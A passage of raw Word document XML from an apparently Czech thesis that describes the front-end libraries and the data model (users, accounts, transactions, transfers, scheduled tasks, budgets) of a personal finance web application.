        <w:t xml:space="preserve"> (to znamená, že je výchozí styl primárně optimalizován pro mobilní telefony a až dodatečně upraven pro desktop prohlížeče pomocí media </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>queries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="002F4311">
        <w:t xml:space="preserve"> Bootstrap nabízí spoustu grafických i funkčních komponent, které mají dobře dokumentované </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F4311">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F4311">
        <w:t xml:space="preserve"> API. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821837"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION LJxnBPZxgc8PiHBo \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[18]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00067949" w:rsidRPr="00502B7A" w:rsidRDefault="00067949" w:rsidP="00502B7A">
      <w:r>
        <w:t>Pro manipulaci s DOM (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Model) stránky bude používána </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> knihovna </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821838"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION b1h7RmDEYrloDwAv \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[26]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>, kterou také interně používá Bootstrap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B658A" w:rsidRDefault="007B658A" w:rsidP="007B658A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc387327873"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Angular.js</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00333BCC" w:rsidRDefault="00333BCC" w:rsidP="00333BCC">
      <w:r>
        <w:t xml:space="preserve">O několik odstavců výše jsem zmínil výhody MVC architektury na straně serveru a také jsem </w:t>
      </w:r>
      <w:r w:rsidR="0072716E">
        <w:t>navrhnul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> využití Web API v přehledových stránkách. Klientská část aplikace na přehledových stránkách bude používat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AngularJS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, který zásadně usnadňuje implementaci MVC přístupu v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JavaScriptu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C339E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821879"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION o0dTUM0VB7z3ecmj \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[27]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007B658A" w:rsidRDefault="007B658A" w:rsidP="00EA6830">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc387327874"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Charts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EA6830" w:rsidRPr="00EA6830" w:rsidRDefault="00755FD1" w:rsidP="00EA6830">
      <w:r>
        <w:t>Pro zobrazování grafů bude použ</w:t>
      </w:r>
      <w:r w:rsidR="0072716E">
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nástroj </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Charts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, který na stránce dokáže vykreslit interaktivní a velmi široce nastavitelné grafy různých typů. Má dobře dokumentované </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> API a veškeré zpracování dat a vykreslování se odehrává přímo v klientském prohlížeči, žádná data nejsou odesílána na cizí servery. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2822011"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION ZGMbMkyPTUp6hSwR \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[28]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00676CAF" w:rsidRDefault="00261787" w:rsidP="00F36BC3">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc387327875"/>
      <w:r>
        <w:t>Implementace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w:rsidR="00E0720D" w:rsidRDefault="00FC0EE2" w:rsidP="00F36BC3">
      <w:r>
        <w:t xml:space="preserve">Samotná implementace aplikace bude sestávat z několika knihoven, které budou oddělovat jednotlivé vrstvy architektury aplikace. Striktně budou především </w:t>
      </w:r>
      <w:r w:rsidR="00691F35">
        <w:t>separované</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> třídy </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>představující datový model aplikace a aplikační logika, pro kterou se tím pádem budou snáze psát unit testy. Prezentační vrstva bude knihovny z nižších vrstev používat pro manipulaci s daty, ale už nebude přidávat další aplikační logiku. Díky tomu bude možné s</w:t>
      </w:r>
      <w:r w:rsidR="00691F35">
        <w:t>oučasně prezentovat výstupy aplikace jednak pomocí klasických webových stránek, ale stejně tak zpřístupnit funkcionalitu aplikace přes služby Web API pro klientské skripty nebo v budoucnu třeba i jiným aplikacím (viz kapitola</w:t>
      </w:r>
      <w:r w:rsidR="003B0755">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003B0755">
        <w:instrText xml:space="preserve"> REF _Ref386046378 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00691F35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00691F35">
        <w:instrText xml:space="preserve"> REF _Ref386046378 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>Další rozvoj aplikace</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00691F35">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005CF3" w:rsidRDefault="00005CF3" w:rsidP="00005CF3">
      <w:r>
        <w:t xml:space="preserve">Na </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386046666 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je znázorněno schéma datového modelu aplikace. </w:t>
      </w:r>
      <w:r w:rsidR="003B0755">
        <w:t xml:space="preserve">Podle něj </w:t>
      </w:r>
      <w:r>
        <w:t>budou data uložena v databázi a obdobně budou vypadat datové třídy, se kterými bude aplikace pracovat. Jednotlivé třídy detailněji pop</w:t>
      </w:r>
      <w:r w:rsidR="003B0755">
        <w:t>íši</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> níže.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005CF3" w:rsidRDefault="00005CF3" w:rsidP="00005CF3">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc387327876"/>
      <w:r>
        <w:t>Uživatel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w:rsidR="00005CF3" w:rsidRDefault="00005CF3" w:rsidP="00005CF3">
      <w:r w:rsidRPr="00D5261C">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> představuje uživatele aplikace, ukládá jeho unikátní uživatelské jméno, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hesla, email, datum a čas posledního přihlášení a měnu, kterou bude uživatel používat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005CF3" w:rsidRDefault="00005CF3" w:rsidP="00005CF3">
      <w:r>
        <w:t xml:space="preserve">Uživatelské jméno a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hesla správce aplikace bude uložen v konfiguračním souboru aplikace, protože správce nebude z bezpečnostních důvodů moci používat aplikaci jako běžný uživatel a tudíž není nutné mít jeho údaje uložené v databázi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005CF3" w:rsidRDefault="00005CF3" w:rsidP="00005CF3">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc387327877"/>
      <w:r>
        <w:t>Účty</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w:rsidR="00005CF3" w:rsidRDefault="00005CF3" w:rsidP="00005CF3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5261C">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> představuje účet, na kterém jsou soustředěny finanční prostředky. Kromě názvu je u něj uložen jeho počáteční stav a aktuální stav, který je aktualizován při zápisu každé transakce. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005CF3" w:rsidRPr="00F36BC3" w:rsidRDefault="00005CF3" w:rsidP="00F36BC3">
      <w:r>
        <w:t xml:space="preserve">Do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5261C">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>AccountMonthlyBalance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se průběžně ukládá hodnota, o kterou se změnil stav účtu v daném měsíci. Aktualizace této hodnoty probíhá při každém uložení transakce. Tato třída je v aplikaci z důvodu vylepšení výkonu při získávání počátečního a koncového stavu účtu v uživatelem zvoleném časovém období. Běžně by bylo potřeba sečíst všechny transakce, které byly vytvořeny od založení účtu až po začátek vybraného období. S použitím této třídy stačí sečíst hodnoty za každý měsíc od vytvoření účtu a poté přičíst pouze transakce, které proběhly od začátku měsíce do dne zvoleného jako začátek období. To může přinést značnou úsporu, pokud vezmeme v potaz, že po ročním používání se jedná o součet 1</w:t>
      </w:r>
      <w:r w:rsidR="00055A0A">
        <w:t>2 čísel místo stovek transakcí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36BC3" w:rsidRDefault="00B26D0D" w:rsidP="00F36BC3">
      <w:pPr>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="7419975"/>
            <wp:effectExtent l="19050" t="0" r="1270" b="0"/>
            <wp:docPr id="11" name="Obrázek 10" descr="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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="7419975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00262BAA" w:rsidRDefault="00F36BC3" w:rsidP="00F36BC3">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Ref386046666"/>
      <w:bookmarkStart w:id="183" w:name="_Ref386046660"/>
      <w:bookmarkStart w:id="184" w:name="_Toc387327923"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="182"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E0720D">
        <w:t>Datový model aplikace</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
      <w:bookmarkEnd w:id="184"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5261C" w:rsidRDefault="00D5261C" w:rsidP="00D5261C">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="_Toc387327878"/>
      <w:r>
        <w:t>Transakce</w:t>
      </w:r>
      <w:r w:rsidR="002A7B1D">
        <w:t xml:space="preserve"> a štítky</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w:rsidR="00D5261C" w:rsidRDefault="00BC4F82" w:rsidP="00D5261C">
      <w:r>
        <w:t xml:space="preserve">Třída </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC4F82">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> moduluje štítek. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC4F82">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Transaction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> představuje transakci</w:t>
      </w:r>
      <w:r w:rsidR="00C65ED4">
        <w:t xml:space="preserve">, která je vždy navázána na účet a může mít přiřazený hlavní kategorizační štítek a volitelně také neomezený počet </w:t>
      </w:r>
      <w:r w:rsidR="00C65ED4">
        <w:lastRenderedPageBreak/>
        <w:t>doplňujících štítků (vazbu mezi transakcí a štítkem modeluje</w:t>
      </w:r>
      <w:r w:rsidR="000F5118">
        <w:t xml:space="preserve"> třída</w:t>
      </w:r>
      <w:r w:rsidR="00C65ED4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C65ED4" w:rsidRPr="00005CF3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>TransactionTag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C65ED4">
        <w:t xml:space="preserve">). Vlastnost </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C65ED4" w:rsidRPr="00005CF3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>TransactionAmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C65ED4">
        <w:t xml:space="preserve"> obsahuje částku, o kterou se změnil zůstatek účtu a</w:t>
      </w:r>
      <w:r w:rsidR="000F5118">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C65ED4" w:rsidRPr="00005CF3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>TransactionType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C65ED4">
        <w:t xml:space="preserve"> rozlišuje jednotlivé druhy transakcí (běžná transakce, převod </w:t>
      </w:r>
      <w:r w:rsidR="00364160">
        <w:t>mezi účty nebo</w:t>
      </w:r>
      <w:r w:rsidR="00C65ED4">
        <w:t xml:space="preserve"> opakovaná transakce). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C65ED4" w:rsidRDefault="00C65ED4" w:rsidP="00D5261C">
      <w:r w:rsidRPr="00005CF3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ukládá informaci o převodu mezi vlastním</w:t>
      </w:r>
      <w:r w:rsidR="00364160">
        <w:t>i účty, kdy propojuje zdrojový s </w:t>
      </w:r>
      <w:r>
        <w:t>cílový</w:t>
      </w:r>
      <w:r w:rsidR="00364160">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> účt</w:t>
      </w:r>
      <w:r w:rsidR="00364160">
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a také zdrojovou </w:t>
      </w:r>
      <w:r w:rsidR="00364160">
        <w:t>s cílovou transakcí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Díky tomu je možné mít transakce nezávislé a přitom spárované. Při smazání jednoho z účtů se z převodu stane běžná transakce, zároveň ale při změně částky je možné aktualizovat obě dvě </w:t>
      </w:r>
      <w:r w:rsidR="0093190C">
        <w:t xml:space="preserve">spárované </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">transakce současně. Dále lze díky informaci o zdrojovém a cílovém účtu efektivně </w:t>
      </w:r>
      <w:r w:rsidR="004B6220">
        <w:t>od</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">filtrovat převody mezi účty, které má uživatel zobrazené současně. Potom </w:t>
      </w:r>
      <w:r w:rsidR="0093190C">
        <w:t>není žádoucí, aby převody viděl jako výdaje a příjmy, protože aplikace vždy se současně zobrazenými účty pracuje jako kdyby se jednalo o jeden virtuální účet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0093190C" w:rsidRDefault="0093190C" w:rsidP="00D5261C">
      <w:r>
        <w:t>Opakované transakce jsou uloženy jako </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00005CF3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ReccurentTransaction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a jsou navázány na transakci, která slouží jako jejich předpis. </w:t>
      </w:r>
      <w:r w:rsidR="00211EDC">
        <w:t xml:space="preserve">Vlastnosti této třídy tedy slouží pouze pro určení, kdy se má provést automatický zápis transakce, ale neduplikují její </w:t>
      </w:r>
      <w:r w:rsidR="004B6220">
        <w:t>nastavení</w:t>
      </w:r>
      <w:r w:rsidR="00211EDC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211EDC" w:rsidRDefault="00211EDC" w:rsidP="00D5261C">
      <w:r>
        <w:t xml:space="preserve">S opakovanými transakcemi souvisí také třída </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00005CF3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ScheduledTask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, kterou bude aplikace interně používat pro spouštění</w:t>
      </w:r>
      <w:r w:rsidR="009A1935">
        <w:t xml:space="preserve"> obecných</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> opakovaných úloh. V praxi bude jedno vlákno běžící v aplikační doméně vyhrazeno pouze pro tyto účely a bude periodicky kontrolovat, zda se v tabulce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00005CF3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ScheduledTask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nevyskytuje záznam o úloze, kterou je třeba spustit (čas naplánovaného běhu je ve vlastnosti </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00005CF3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ScheduledTaskNextRun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). Pokud takový záznam najde, provede spuštění dané naplánované úlohy pomocí reflexe. Úloha bude specifikovat </w:t>
      </w:r>
      <w:r w:rsidR="009A1935">
        <w:t xml:space="preserve">název </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assembly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a tříd</w:t>
      </w:r>
      <w:r w:rsidR="009A1935">
        <w:t>y implementující speciální rozhraní</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, která se </w:t>
      </w:r>
      <w:r w:rsidR="009A1935">
        <w:t>bude</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>instancovat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009A1935">
        <w:t xml:space="preserve"> Zodpovědností </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A1935">
        <w:t>instancované</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A1935">
        <w:t xml:space="preserve"> třídy potom bude například projít všechny opakované transakce a zapsat ty, které jsou naplánované na dnešní den. Výhodou tohoto řešení je především obecnost a jednoduchá rozšiřitelnost o další typy naplánovaných úloh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5467E" w:rsidRDefault="00F5467E" w:rsidP="00F5467E">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_Toc387327879"/>
      <w:r>
        <w:t>Rozpočty</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w:rsidR="00332CD3" w:rsidRPr="00332CD3" w:rsidRDefault="00332CD3" w:rsidP="00332CD3">
      <w:r>
        <w:t xml:space="preserve">Rozpočet reprezentuje třída </w:t>
      </w:r>
      <w:r w:rsidRPr="00332CD3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Budget</w:t>
      </w:r>
      <w:r>
        <w:t>. Kromě vlastností definujících omezující částku (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00332CD3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>BudgetAmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) a dobu platnosti (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00332CD3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>BudgetStartDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00332CD3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>BudgetEndDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) obsahuje i vlastnost </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00332CD3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>BudgetType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, která určuje zda se jedná o jednorázový nebo opakovaný týdenní, případně měsíční rozpočet. Rozpočet je standardně aplikován na </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">všechny transakce všech účtů, ale může být omezen jen na vybrané účty a štítky pomocí vazeb modelovaných třídami </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00332CD3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>BudgetTag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00332CD3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>BudgetAccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5467E" w:rsidRDefault="00F5467E" w:rsidP="00F5467E">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc387327880"/>
      <w:r>
        <w:t>Vozidla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w:rsidR="0059258B" w:rsidRDefault="001A0E40" w:rsidP="0059258B">
